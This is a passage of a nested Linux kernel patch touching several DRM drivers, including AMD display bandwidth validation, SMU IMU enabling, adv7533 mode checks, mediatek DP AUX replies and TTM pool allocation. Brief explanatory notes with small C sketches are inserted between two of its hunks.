+diff --git a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_resource.c b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_resource.c
+index fddc21a5a04c4..d825f11b4feaa 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_resource.c
+@@ -1770,7 +1770,7 @@ bool dcn31_validate_bandwidth(struct dc *dc,
+ 	BW_VAL_TRACE_COUNT();
+ 
+ 	DC_FP_START();
+-	out = dcn30_internal_validate_bw(dc, context, pipes, &pipe_cnt, &vlevel, fast_validate);
++	out = dcn30_internal_validate_bw(dc, context, pipes, &pipe_cnt, &vlevel, fast_validate, true);
+ 	DC_FP_END();
+ 
+ 	// Disable fast_validate to set min dcfclk in alculate_wm_and_dlg
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+index 9918bccd6defb..ffaa4e5b3fca0 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+@@ -1689,6 +1689,81 @@ static void dcn314_get_panel_config_defaults(struct dc_panel_config *panel_confi
+ 	*panel_config = panel_config_defaults;
+ }
+ 
++static bool filter_modes_for_single_channel_workaround(struct dc *dc,
++		struct dc_state *context)
++{
++	// Filter 2K@240Hz+8K@24fps above combination timing if memory only has single dimm LPDDR
++	if (dc->clk_mgr->bw_params->vram_type == 34 && dc->clk_mgr->bw_params->num_channels < 2) {
++		int total_phy_pix_clk = 0;
++
++		for (int i = 0; i < context->stream_count; i++)
++			if (context->res_ctx.pipe_ctx[i].stream)
++				total_phy_pix_clk += context->res_ctx.pipe_ctx[i].stream->phy_pix_clk;
++
++		if (total_phy_pix_clk >= (1148928+826260)) //2K@240Hz+8K@24fps
++			return true;
++	}
++	return false;
++}
++
++bool dcn314_validate_bandwidth(struct dc *dc,
++		struct dc_state *context,
++		bool fast_validate)
++{
++	bool out = false;
++
++	BW_VAL_TRACE_SETUP();
++
++	int vlevel = 0;
++	int pipe_cnt = 0;
++	display_e2e_pipe_params_st *pipes = kzalloc(dc->res_pool->pipe_count * sizeof(display_e2e_pipe_params_st), GFP_KERNEL);
++	DC_LOGGER_INIT(dc->ctx->logger);
++
++	BW_VAL_TRACE_COUNT();
++
++	if (filter_modes_for_single_channel_workaround(dc, context))
++		goto validate_fail;
++
++	DC_FP_START();
++	// do not support self refresh only
++	out = dcn30_internal_validate_bw(dc, context, pipes, &pipe_cnt, &vlevel, fast_validate, false);
++	DC_FP_END();
++
++	// Disable fast_validate to set min dcfclk in calculate_wm_and_dlg
++	if (pipe_cnt == 0)
++		fast_validate = false;
++
++	if (!out)
++		goto validate_fail;
++
++	BW_VAL_TRACE_END_VOLTAGE_LEVEL();
++
++	if (fast_validate) {
++		BW_VAL_TRACE_SKIP(fast);
++		goto validate_out;
++	}
++
++	dc->res_pool->funcs->calculate_wm_and_dlg(dc, context, pipes, pipe_cnt, vlevel);
++
++	BW_VAL_TRACE_END_WATERMARKS();
++
++	goto validate_out;
++
++validate_fail:
++	DC_LOG_WARNING("Mode Validation Warning: %s failed validation.\n",
++		dml_get_status_message(context->bw_ctx.dml.vba.ValidationStatus[context->bw_ctx.dml.vba.soc.num_states]));
++
++	BW_VAL_TRACE_SKIP(fail);
++	out = false;
++
++validate_out:
++	kfree(pipes);
++
++	BW_VAL_TRACE_FINISH();
++
++	return out;
++}
++
+ static struct resource_funcs dcn314_res_pool_funcs = {
+ 	.destroy = dcn314_destroy_resource_pool,
+ 	.link_enc_create = dcn31_link_encoder_create,
+@@ -1696,7 +1771,7 @@ static struct resource_funcs dcn314_res_pool_funcs = {
+ 	.link_encs_assign = link_enc_cfg_link_encs_assign,
+ 	.link_enc_unassign = link_enc_cfg_link_enc_unassign,
+ 	.panel_cntl_create = dcn31_panel_cntl_create,
+-	.validate_bandwidth = dcn31_validate_bandwidth,
++	.validate_bandwidth = dcn314_validate_bandwidth,
+ 	.calculate_wm_and_dlg = dcn31_calculate_wm_and_dlg,
+ 	.update_soc_for_wm_a = dcn31_update_soc_for_wm_a,
+ 	.populate_dml_pipes = dcn314_populate_dml_pipes_from_context,
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.h b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.h
+index 0dd3153aa5c17..49ffe71018dfb 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.h
+@@ -39,6 +39,10 @@ struct dcn314_resource_pool {
+ 	struct resource_pool base;
+ };
+ 
++bool dcn314_validate_bandwidth(struct dc *dc,
++		struct dc_state *context,
++		bool fast_validate);
++
+ struct resource_pool *dcn314_create_resource_pool(
+ 		const struct dc_init_data *init_data,
+ 		struct dc *dc);
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn30/dcn30_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn30/dcn30_fpu.c
+index e1e92daba6686..990dbd736e2ce 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn30/dcn30_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn30/dcn30_fpu.c
+@@ -636,7 +636,7 @@ int dcn30_find_dummy_latency_index_for_fw_based_mclk_switch(struct dc *dc,
+ 	while (dummy_latency_index < max_latency_table_entries) {
+ 		context->bw_ctx.dml.soc.dram_clock_change_latency_us =
+ 				dc->clk_mgr->bw_params->dummy_pstate_table[dummy_latency_index].dummy_pstate_latency_us;
+-		dcn30_internal_validate_bw(dc, context, pipes, &pipe_cnt, &vlevel, false);
++		dcn30_internal_validate_bw(dc, context, pipes, &pipe_cnt, &vlevel, false, true);
+ 
+ 		if (context->bw_ctx.dml.soc.allow_dram_self_refresh_or_dram_clock_change_in_vblank ==
+ 			dm_allow_self_refresh_and_mclk_switch)
+diff --git a/drivers/gpu/drm/amd/display/modules/power/power_helpers.c b/drivers/gpu/drm/amd/display/modules/power/power_helpers.c
+index 235259d6c5a16..9edd39322c822 100644
+--- a/drivers/gpu/drm/amd/display/modules/power/power_helpers.c
++++ b/drivers/gpu/drm/amd/display/modules/power/power_helpers.c
+@@ -907,3 +907,38 @@ bool mod_power_only_edp(const struct dc_state *context, const struct dc_stream_s
+ {
+ 	return context && context->stream_count == 1 && dc_is_embedded_signal(stream->signal);
+ }
++
++bool psr_su_set_y_granularity(struct dc *dc, struct dc_link *link,
++			      struct dc_stream_state *stream,
++			      struct psr_config *config)
++{
++	uint16_t pic_height;
++	uint8_t slice_height;
++
++	if ((link->connector_signal & SIGNAL_TYPE_EDP) &&
++	    (!dc->caps.edp_dsc_support ||
++	    link->panel_config.dsc.disable_dsc_edp ||
++	    !link->dpcd_caps.dsc_caps.dsc_basic_caps.fields.dsc_support.DSC_SUPPORT ||
++	    !stream->timing.dsc_cfg.num_slices_v))
++		return true;
++
++	pic_height = stream->timing.v_addressable +
++		stream->timing.v_border_top + stream->timing.v_border_bottom;
++
++	if (stream->timing.dsc_cfg.num_slices_v == 0)
++		return false;
++
++	slice_height = pic_height / stream->timing.dsc_cfg.num_slices_v;
++
++	if (slice_height) {
++		if (config->su_y_granularity &&
++		    (slice_height % config->su_y_granularity)) {
++			ASSERT(0);
++			return false;
++		}
++
++		config->su_y_granularity = slice_height;
++	}
++
++	return true;
++}
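
psr_su_set_y_granularity() ties PSR-SU updates to DSC slicing: the slice height is pic_height / num_slices_v, and any granularity already requested must divide that evenly, otherwise the configuration is rejected. A compact sketch of just that arithmetic (names are illustrative):

  #include <stdbool.h>
  #include <stdint.h>

  /* Returns false when DSC slicing and the requested selective-update
   * Y granularity cannot be reconciled; otherwise updates it in place. */
  static bool set_y_granularity(uint16_t pic_height, uint8_t num_slices_v,
                                uint16_t *su_y_granularity)
  {
      uint16_t slice_height;

      if (num_slices_v == 0)
          return false;               /* guard the division */

      slice_height = pic_height / num_slices_v;
      if (!slice_height)
          return true;                /* nothing to constrain */

      /* An existing granularity must evenly divide the slice height. */
      if (*su_y_granularity && (slice_height % *su_y_granularity))
          return false;

      *su_y_granularity = slice_height;
      return true;
  }

For example, a 2160-line picture cut into 8 DSC slices gives a 270-line slice height, which becomes the SU Y granularity unless a conflicting value was already set.
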
+diff --git a/drivers/gpu/drm/amd/display/modules/power/power_helpers.h b/drivers/gpu/drm/amd/display/modules/power/power_helpers.h
+index 316452e9dbc91..bb16b37b83da7 100644
+--- a/drivers/gpu/drm/amd/display/modules/power/power_helpers.h
++++ b/drivers/gpu/drm/amd/display/modules/power/power_helpers.h
+@@ -59,4 +59,7 @@ void mod_power_calc_psr_configs(struct psr_config *psr_config,
+ 		const struct dc_stream_state *stream);
+ bool mod_power_only_edp(const struct dc_state *context,
+ 		const struct dc_stream_state *stream);
++bool psr_su_set_y_granularity(struct dc *dc, struct dc_link *link,
++			      struct dc_stream_state *stream,
++			      struct psr_config *config);
+ #endif /* MODULES_POWER_POWER_HELPERS_H_ */
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+index ed36088ebcfde..6d03459de5612 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+@@ -161,10 +161,15 @@ int smu_get_dpm_freq_range(struct smu_context *smu,
+ 
+ int smu_set_gfx_power_up_by_imu(struct smu_context *smu)
+ {
+-	if (!smu->ppt_funcs && !smu->ppt_funcs->set_gfx_power_up_by_imu)
+-		return -EOPNOTSUPP;
++	int ret = 0;
++	struct amdgpu_device *adev = smu->adev;
+ 
+-	return smu->ppt_funcs->set_gfx_power_up_by_imu(smu);
++	if (smu->ppt_funcs->set_gfx_power_up_by_imu) {
++		ret = smu->ppt_funcs->set_gfx_power_up_by_imu(smu);
++		if (ret)
++			dev_err(adev->dev, "Failed to enable gfx imu!\n");
++	}
++	return ret;
+ }
+ 
+ static u32 smu_get_mclk(void *handle, bool low)
+@@ -195,6 +200,19 @@ static u32 smu_get_sclk(void *handle, bool low)
+ 	return clk_freq * 100;
+ }
+ 
++static int smu_set_gfx_imu_enable(struct smu_context *smu)
++{
++	struct amdgpu_device *adev = smu->adev;
++
++	if (adev->firmware.load_type != AMDGPU_FW_LOAD_PSP)
++		return 0;
++
++	if (amdgpu_in_reset(smu->adev) || adev->in_s0ix)
++		return 0;
++
++	return smu_set_gfx_power_up_by_imu(smu);
++}
++
+ static int smu_dpm_set_vcn_enable(struct smu_context *smu,
+ 				  bool enable)
+ {
+@@ -1386,15 +1404,9 @@ static int smu_hw_init(void *handle)
+ 	}
+ 
+ 	if (smu->is_apu) {
+-		if ((smu->ppt_funcs->set_gfx_power_up_by_imu) &&
+-				likely(adev->firmware.load_type == AMDGPU_FW_LOAD_PSP)) {
+-			ret = smu->ppt_funcs->set_gfx_power_up_by_imu(smu);
+-			if (ret) {
+-				dev_err(adev->dev, "Failed to Enable gfx imu!\n");
+-				return ret;
+-			}
+-		}
+-
++		ret = smu_set_gfx_imu_enable(smu);
++		if (ret)
++			return ret;
+ 		smu_dpm_set_vcn_enable(smu, true);
+ 		smu_dpm_set_jpeg_enable(smu, true);
+ 		smu_set_gfx_cgpg(smu, true);
+@@ -1670,6 +1682,10 @@ static int smu_resume(void *handle)
+ 		return ret;
+ 	}
+ 
++	ret = smu_set_gfx_imu_enable(smu);
++	if (ret)
++		return ret;
++
+ 	smu_set_gfx_cgpg(smu, true);
+ 
+ 	smu->disable_uclk_switch = 0;
+diff --git a/drivers/gpu/drm/bridge/adv7511/adv7533.c b/drivers/gpu/drm/bridge/adv7511/adv7533.c
+index 258c79d4dab0a..b8eeaf4736e70 100644
+--- a/drivers/gpu/drm/bridge/adv7511/adv7533.c
++++ b/drivers/gpu/drm/bridge/adv7511/adv7533.c
+@@ -103,22 +103,19 @@ void adv7533_dsi_power_off(struct adv7511 *adv)
+ enum drm_mode_status adv7533_mode_valid(struct adv7511 *adv,
+ 					const struct drm_display_mode *mode)
+ {
+-	int lanes;
++	unsigned long max_lane_freq;
+ 	struct mipi_dsi_device *dsi = adv->dsi;
++	u8 bpp = mipi_dsi_pixel_format_to_bpp(dsi->format);
+ 
+-	if (mode->clock > 80000)
+-		lanes = 4;
+-	else
+-		lanes = 3;
+-
+-	/*
+-	 * TODO: add support for dynamic switching of lanes
+-	 * by using the bridge pre_enable() op . Till then filter
+-	 * out the modes which shall need different number of lanes
+-	 * than what was configured in the device tree.
+-	 */
+-	if (lanes != dsi->lanes)
+-		return MODE_BAD;
++	/* Check max clock for either 7533 or 7535 */
++	if (mode->clock > (adv->type == ADV7533 ? 80000 : 148500))
++		return MODE_CLOCK_HIGH;
++
++	/* Check max clock for each lane */
++	max_lane_freq = (adv->type == ADV7533 ? 800000 : 891000);
++
++	if (mode->clock * bpp > max_lane_freq * adv->num_dsi_lanes)
++		return MODE_CLOCK_HIGH;
+ 
+ 	return MODE_OK;
+ }
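
The rewritten adv7533 mode_valid() stops guessing a lane count from the pixel clock and instead checks raw bandwidth: a mode fits when pixel clock * bits-per-pixel stays within per-lane frequency * configured lane count, with the per-chip limits quoted in the hunk (80000/800000 kHz for ADV7533, 148500/891000 kHz for ADV7535). The same check as a standalone helper:

  #include <stdbool.h>

  /* clock and max_lane_freq in kHz; bpp comes from the DSI pixel format. */
  static bool dsi_mode_fits(unsigned long clock, unsigned int bpp,
                            unsigned long max_lane_freq, unsigned int lanes)
  {
      return clock * bpp <= max_lane_freq * lanes;
  }

  /* Example: 148500 kHz pixel clock at 24 bpp on 4 ADV7535 lanes:
   * 148500 * 24 = 3564000 <= 891000 * 4 = 3564000, so the mode passes. */
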
+diff --git a/drivers/gpu/drm/drm_probe_helper.c b/drivers/gpu/drm/drm_probe_helper.c
+index 69b0b2b9cc1c5..3b968ad187cf3 100644
+--- a/drivers/gpu/drm/drm_probe_helper.c
++++ b/drivers/gpu/drm/drm_probe_helper.c
+@@ -557,8 +557,9 @@ retry:
+ 		 */
+ 		dev->mode_config.delayed_event = true;
+ 		if (dev->mode_config.poll_enabled)
+-			schedule_delayed_work(&dev->mode_config.output_poll_work,
+-					      0);
++			mod_delayed_work(system_wq,
++					 &dev->mode_config.output_poll_work,
++					 0);
+ 	}
+ 
+ 	/* Re-enable polling in case the global poll config changed. */
+diff --git a/drivers/gpu/drm/i915/display/intel_display.c b/drivers/gpu/drm/i915/display/intel_display.c
+index 3f3982ae9974b..455d9ae6c41c9 100644
+--- a/drivers/gpu/drm/i915/display/intel_display.c
++++ b/drivers/gpu/drm/i915/display/intel_display.c
+@@ -1079,7 +1079,7 @@ intel_get_crtc_new_encoder(const struct intel_atomic_state *state,
+ 		num_encoders++;
+ 	}
+ 
+-	drm_WARN(encoder->base.dev, num_encoders != 1,
++	drm_WARN(state->base.dev, num_encoders != 1,
+ 		 "%d encoders for pipe %c\n",
+ 		 num_encoders, pipe_name(master_crtc->pipe));
+ 
+diff --git a/drivers/gpu/drm/lima/lima_drv.c b/drivers/gpu/drm/lima/lima_drv.c
+index 7b8d7178d09aa..39cab4a55f572 100644
+--- a/drivers/gpu/drm/lima/lima_drv.c
++++ b/drivers/gpu/drm/lima/lima_drv.c
+@@ -392,8 +392,10 @@ static int lima_pdev_probe(struct platform_device *pdev)
+ 
+ 	/* Allocate and initialize the DRM device. */
+ 	ddev = drm_dev_alloc(&lima_drm_driver, &pdev->dev);
+-	if (IS_ERR(ddev))
+-		return PTR_ERR(ddev);
++	if (IS_ERR(ddev)) {
++		err = PTR_ERR(ddev);
++		goto err_out0;
++	}
+ 
+ 	ddev->dev_private = ldev;
+ 	ldev->ddev = ddev;
+diff --git a/drivers/gpu/drm/mediatek/mtk_dp.c b/drivers/gpu/drm/mediatek/mtk_dp.c
+index 9d085c05c49c3..007af69e5026f 100644
+--- a/drivers/gpu/drm/mediatek/mtk_dp.c
++++ b/drivers/gpu/drm/mediatek/mtk_dp.c
+@@ -806,10 +806,9 @@ static int mtk_dp_aux_wait_for_completion(struct mtk_dp *mtk_dp, bool is_read)
+ }
+ 
+ static int mtk_dp_aux_do_transfer(struct mtk_dp *mtk_dp, bool is_read, u8 cmd,
+-				  u32 addr, u8 *buf, size_t length)
++				  u32 addr, u8 *buf, size_t length, u8 *reply_cmd)
+ {
+ 	int ret;
+-	u32 reply_cmd;
+ 
+ 	if (is_read && (length > DP_AUX_MAX_PAYLOAD_BYTES ||
+ 			(cmd == DP_AUX_NATIVE_READ && !length)))
+@@ -841,10 +840,10 @@ static int mtk_dp_aux_do_transfer(struct mtk_dp *mtk_dp, bool is_read, u8 cmd,
+ 	/* Wait for feedback from sink device. */
+ 	ret = mtk_dp_aux_wait_for_completion(mtk_dp, is_read);
+ 
+-	reply_cmd = mtk_dp_read(mtk_dp, MTK_DP_AUX_P0_3624) &
+-		    AUX_RX_REPLY_COMMAND_AUX_TX_P0_MASK;
++	*reply_cmd = mtk_dp_read(mtk_dp, MTK_DP_AUX_P0_3624) &
++		     AUX_RX_REPLY_COMMAND_AUX_TX_P0_MASK;
+ 
+-	if (ret || reply_cmd) {
++	if (ret) {
+ 		u32 phy_status = mtk_dp_read(mtk_dp, MTK_DP_AUX_P0_3628) &
+ 				 AUX_RX_PHY_STATE_AUX_TX_P0_MASK;
+ 		if (phy_status != AUX_RX_PHY_STATE_AUX_TX_P0_RX_IDLE) {
+@@ -1823,7 +1822,8 @@ static irqreturn_t mtk_dp_hpd_event_thread(int hpd, void *dev)
+ 	spin_unlock_irqrestore(&mtk_dp->irq_thread_lock, flags);
+ 
+ 	if (status & MTK_DP_THREAD_CABLE_STATE_CHG) {
+-		drm_helper_hpd_irq_event(mtk_dp->bridge.dev);
++		if (mtk_dp->bridge.dev)
++			drm_helper_hpd_irq_event(mtk_dp->bridge.dev);
+ 
+ 		if (!mtk_dp->train_info.cable_plugged_in) {
+ 			mtk_dp_disable_sdp_aui(mtk_dp);
+@@ -2070,7 +2070,7 @@ static ssize_t mtk_dp_aux_transfer(struct drm_dp_aux *mtk_aux,
+ 		ret = mtk_dp_aux_do_transfer(mtk_dp, is_read, request,
+ 					     msg->address + accessed_bytes,
+ 					     msg->buffer + accessed_bytes,
+-					     to_access);
++					     to_access, &msg->reply);
+ 
+ 		if (ret) {
+ 			drm_info(mtk_dp->drm_dev,
+@@ -2080,7 +2080,6 @@ static ssize_t mtk_dp_aux_transfer(struct drm_dp_aux *mtk_aux,
+ 		accessed_bytes += to_access;
+ 	} while (accessed_bytes < msg->size);
+ 
+-	msg->reply = DP_AUX_NATIVE_REPLY_ACK | DP_AUX_I2C_REPLY_ACK;
+ 	return msg->size;
+ err:
+ 	msg->reply = DP_AUX_NATIVE_REPLY_NACK | DP_AUX_I2C_REPLY_NACK;
+diff --git a/drivers/gpu/drm/msm/adreno/a5xx_gpu.c b/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
+index 4f0dbeebb79fb..02ff306f96f42 100644
+--- a/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
++++ b/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
+@@ -1750,6 +1750,7 @@ struct msm_gpu *a5xx_gpu_init(struct drm_device *dev)
+ 	struct a5xx_gpu *a5xx_gpu = NULL;
+ 	struct adreno_gpu *adreno_gpu;
+ 	struct msm_gpu *gpu;
++	unsigned int nr_rings;
+ 	int ret;
+ 
+ 	if (!pdev) {
+@@ -1770,7 +1771,12 @@ struct msm_gpu *a5xx_gpu_init(struct drm_device *dev)
+ 
+ 	check_speed_bin(&pdev->dev);
+ 
+-	ret = adreno_gpu_init(dev, pdev, adreno_gpu, &funcs, 4);
++	nr_rings = 4;
++
++	if (adreno_is_a510(adreno_gpu))
++		nr_rings = 1;
++
++	ret = adreno_gpu_init(dev, pdev, adreno_gpu, &funcs, nr_rings);
+ 	if (ret) {
+ 		a5xx_destroy(&(a5xx_gpu->base.base));
+ 		return ERR_PTR(ret);
+diff --git a/drivers/gpu/drm/msm/adreno/adreno_device.c b/drivers/gpu/drm/msm/adreno/adreno_device.c
+index c5c4c93b3689c..cd009d56d35d5 100644
+--- a/drivers/gpu/drm/msm/adreno/adreno_device.c
++++ b/drivers/gpu/drm/msm/adreno/adreno_device.c
+@@ -438,9 +438,6 @@ struct msm_gpu *adreno_load_gpu(struct drm_device *dev)
+ 	 */
+ 	pm_runtime_enable(&pdev->dev);
+ 
+-	/* Make sure pm runtime is active and reset any previous errors */
+-	pm_runtime_set_active(&pdev->dev);
+-
+ 	ret = pm_runtime_get_sync(&pdev->dev);
+ 	if (ret < 0) {
+ 		pm_runtime_put_sync(&pdev->dev);
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
+index 9c6817b5a1943..547f9f2b9fcb5 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
+@@ -654,7 +654,7 @@ static int dpu_encoder_virt_atomic_check(
+ 		if (drm_atomic_crtc_needs_modeset(crtc_state)) {
+ 			dpu_rm_release(global_state, drm_enc);
+ 
+-			if (!crtc_state->active_changed || crtc_state->active)
++			if (!crtc_state->active_changed || crtc_state->enable)
+ 				ret = dpu_rm_reserve(&dpu_kms->rm, global_state,
+ 						drm_enc, crtc_state, topology);
+ 		}
+diff --git a/drivers/gpu/drm/panel/panel-novatek-nt35950.c b/drivers/gpu/drm/panel/panel-novatek-nt35950.c
+index 3a844917da075..5d04957b1144f 100644
+--- a/drivers/gpu/drm/panel/panel-novatek-nt35950.c
++++ b/drivers/gpu/drm/panel/panel-novatek-nt35950.c
+@@ -593,8 +593,12 @@ static int nt35950_probe(struct mipi_dsi_device *dsi)
+ 		       DRM_MODE_CONNECTOR_DSI);
+ 
+ 	ret = drm_panel_of_backlight(&nt->panel);
+-	if (ret)
++	if (ret) {
++		if (num_dsis == 2)
++			mipi_dsi_device_unregister(nt->dsi[1]);
++
+ 		return dev_err_probe(dev, ret, "Failed to get backlight\n");
++	}
+ 
+ 	drm_panel_add(&nt->panel);
+ 
+@@ -610,6 +614,10 @@ static int nt35950_probe(struct mipi_dsi_device *dsi)
+ 
+ 		ret = mipi_dsi_attach(nt->dsi[i]);
+ 		if (ret < 0) {
++			/* If we fail to attach to either host, we're done */
++			if (num_dsis == 2)
++				mipi_dsi_device_unregister(nt->dsi[1]);
++
+ 			return dev_err_probe(dev, ret,
+ 					     "Cannot attach to DSI%d host.\n", i);
+ 		}
+diff --git a/drivers/gpu/drm/rcar-du/rcar_du_encoder.c b/drivers/gpu/drm/rcar-du/rcar_du_encoder.c
+index b1787be31e92c..7ecec7b04a8d0 100644
+--- a/drivers/gpu/drm/rcar-du/rcar_du_encoder.c
++++ b/drivers/gpu/drm/rcar-du/rcar_du_encoder.c
+@@ -109,8 +109,8 @@ int rcar_du_encoder_init(struct rcar_du_device *rcdu,
+ 	renc = drmm_encoder_alloc(&rcdu->ddev, struct rcar_du_encoder, base,
+ 				  &rcar_du_encoder_funcs, DRM_MODE_ENCODER_NONE,
+ 				  NULL);
+-	if (!renc)
+-		return -ENOMEM;
++	if (IS_ERR(renc))
++		return PTR_ERR(renc);
+ 
+ 	renc->output = output;
+ 
+diff --git a/drivers/gpu/drm/rockchip/rockchip_drm_gem.c b/drivers/gpu/drm/rockchip/rockchip_drm_gem.c
+index da8a69953706d..9426f7976d22e 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_drm_gem.c
++++ b/drivers/gpu/drm/rockchip/rockchip_drm_gem.c
+@@ -261,9 +261,6 @@ static int rockchip_drm_gem_object_mmap(struct drm_gem_object *obj,
+ 	else
+ 		ret = rockchip_drm_gem_object_mmap_dma(obj, vma);
+ 
+-	if (ret)
+-		drm_gem_vm_close(vma);
+-
+ 	return ret;
+ }
+ 
+diff --git a/drivers/gpu/drm/ttm/ttm_pool.c b/drivers/gpu/drm/ttm/ttm_pool.c
+index 21b61631f73a1..86affe987a1cb 100644
+--- a/drivers/gpu/drm/ttm/ttm_pool.c
++++ b/drivers/gpu/drm/ttm/ttm_pool.c
+@@ -344,6 +344,65 @@ static unsigned int ttm_pool_page_order(struct ttm_pool *pool, struct page *p)
+ 	return p->private;
+ }
+ 
++/* Called when we got a page, either from a pool or newly allocated */
++static int ttm_pool_page_allocated(struct ttm_pool *pool, unsigned int order,
++				   struct page *p, dma_addr_t **dma_addr,
++				   unsigned long *num_pages,
++				   struct page ***pages)
++{
++	unsigned int i;
++	int r;
++
++	if (*dma_addr) {
++		r = ttm_pool_map(pool, order, p, dma_addr);
++		if (r)
++			return r;
++	}
++
++	*num_pages -= 1 << order;
++	for (i = 1 << order; i; --i, ++(*pages), ++p)
++		**pages = p;
++
++	return 0;
++}
++
++/**
++ * ttm_pool_free_range() - Free a range of TTM pages
++ * @pool: The pool used for allocating.
++ * @tt: The struct ttm_tt holding the page pointers.
++ * @caching: The page caching mode used by the range.
++ * @start_page: index for first page to free.
++ * @end_page: index for last page to free + 1.
++ *
++ * During allocation the ttm_tt page-vector may be populated with ranges of
++ * pages with different attributes if allocation hit an error without being
++ * able to completely fulfill the allocation. This function can be used
++ * to free these individual ranges.
++ */
++static void ttm_pool_free_range(struct ttm_pool *pool, struct ttm_tt *tt,
++				enum ttm_caching caching,
++				pgoff_t start_page, pgoff_t end_page)
++{
++	struct page **pages = tt->pages;
++	unsigned int order;
++	pgoff_t i, nr;
++
++	for (i = start_page; i < end_page; i += nr, pages += nr) {
++		struct ttm_pool_type *pt = NULL;
++
++		order = ttm_pool_page_order(pool, *pages);
++		nr = (1UL << order);
++		if (tt->dma_address)
++			ttm_pool_unmap(pool, tt->dma_address[i], nr);
++
++		pt = ttm_pool_select_type(pool, caching, order);
++		if (pt)
++			ttm_pool_type_give(pt, *pages);
++		else
++			ttm_pool_free_page(pool, caching, order, *pages);
++	}
++}
++
+ /**
+  * ttm_pool_alloc - Fill a ttm_tt object
+  *
+@@ -359,12 +418,14 @@ static unsigned int ttm_pool_page_order(struct ttm_pool *pool, struct page *p)
+ int ttm_pool_alloc(struct ttm_pool *pool, struct ttm_tt *tt,
+ 		   struct ttm_operation_ctx *ctx)
+ {
+-	unsigned long num_pages = tt->num_pages;
++	pgoff_t num_pages = tt->num_pages;
+ 	dma_addr_t *dma_addr = tt->dma_address;
+ 	struct page **caching = tt->pages;
+ 	struct page **pages = tt->pages;
++	enum ttm_caching page_caching;
+ 	gfp_t gfp_flags = GFP_USER;
+-	unsigned int i, order;
++	pgoff_t caching_divide;
++	unsigned int order;
+ 	struct page *p;
+ 	int r;
+ 
+@@ -385,45 +446,61 @@ int ttm_pool_alloc(struct ttm_pool *pool, struct ttm_tt *tt,
+ 	for (order = min_t(unsigned int, MAX_ORDER - 1, __fls(num_pages));
+ 	     num_pages;
+ 	     order = min_t(unsigned int, order, __fls(num_pages))) {
+-		bool apply_caching = false;
+ 		struct ttm_pool_type *pt;
+ 
++		page_caching = tt->caching;
+ 		pt = ttm_pool_select_type(pool, tt->caching, order);
+ 		p = pt ? ttm_pool_type_take(pt) : NULL;
+ 		if (p) {
+-			apply_caching = true;
+-		} else {
+-			p = ttm_pool_alloc_page(pool, gfp_flags, order);
+-			if (p && PageHighMem(p))
+-				apply_caching = true;
+-		}
+-
+-		if (!p) {
+-			if (order) {
+-				--order;
+-				continue;
+-			}
+-			r = -ENOMEM;
+-			goto error_free_all;
+-		}
+-
+-		if (apply_caching) {
+ 			r = ttm_pool_apply_caching(caching, pages,
+ 						   tt->caching);
+ 			if (r)
+ 				goto error_free_page;
+-			caching = pages + (1 << order);
++
++			caching = pages;
++			do {
++				r = ttm_pool_page_allocated(pool, order, p,
++							    &dma_addr,
++							    &num_pages,
++							    &pages);
++				if (r)
++					goto error_free_page;
++
++				caching = pages;
++				if (num_pages < (1 << order))
++					break;
++
++				p = ttm_pool_type_take(pt);
++			} while (p);
+ 		}
+ 
+-		if (dma_addr) {
+-			r = ttm_pool_map(pool, order, p, &dma_addr);
++		page_caching = ttm_cached;
++		while (num_pages >= (1 << order) &&
++		       (p = ttm_pool_alloc_page(pool, gfp_flags, order))) {
++
++			if (PageHighMem(p)) {
++				r = ttm_pool_apply_caching(caching, pages,
++							   tt->caching);
++				if (r)
++					goto error_free_page;
++				caching = pages;
++			}
++			r = ttm_pool_page_allocated(pool, order, p, &dma_addr,
++						    &num_pages, &pages);
+ 			if (r)
+ 				goto error_free_page;
++			if (PageHighMem(p))
++				caching = pages;
+ 		}
+ 
+-		num_pages -= 1 << order;
+-		for (i = 1 << order; i; --i)
+-			*(pages++) = p++;
++		if (!p) {
++			if (order) {
++				--order;
++				continue;
++			}
++			r = -ENOMEM;
++			goto error_free_all;
++		}
+ 	}
+ 
+ 	r = ttm_pool_apply_caching(caching, pages, tt->caching);
+@@ -433,15 +510,13 @@ int ttm_pool_alloc(struct ttm_pool *pool, struct ttm_tt *tt,
+ 	return 0;
+ 
+ error_free_page:
+-	ttm_pool_free_page(pool, tt->caching, order, p);
++	ttm_pool_free_page(pool, page_caching, order, p);
+ 
+ error_free_all:
+ 	num_pages = tt->num_pages - num_pages;
+-	for (i = 0; i < num_pages; ) {
+-		order = ttm_pool_page_order(pool, tt->pages[i]);
+-		ttm_pool_free_page(pool, tt->caching, order, tt->pages[i]);
+-		i += 1 << order;
+-	}
++	caching_divide = caching - tt->pages;
++	ttm_pool_free_range(pool, tt, tt->caching, 0, caching_divide);
++	ttm_pool_free_range(pool, tt, ttm_cached, caching_divide, num_pages);
+ 
